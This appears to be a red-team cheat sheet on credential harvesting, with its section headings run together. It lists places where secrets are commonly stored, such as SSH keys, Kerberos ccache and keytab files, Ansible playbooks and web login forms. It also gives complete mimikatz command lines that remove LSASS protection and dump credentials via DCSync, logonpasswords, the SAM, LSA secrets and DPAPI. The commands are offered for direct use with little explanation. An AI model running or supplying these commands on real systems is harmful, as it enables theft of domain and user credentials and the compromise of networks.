Credentials
From File
C:\program files\xxx\mail.ps1
C:\inetpub\wwwroot\loginform.aspxDcsync
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exitlogonpasswords
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords"exitSAM
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam"exitSecret
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::secrets"exitDPAPI
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::dpapi"exitSSH Key
id_rsa: Could be other user's.
authorized_keys
known_hosts
Ansible
/opt/web.ymlJfrog
ccache
/tmp/krb5cc_alicekeytab
/etc/krb5.keytab
Last updated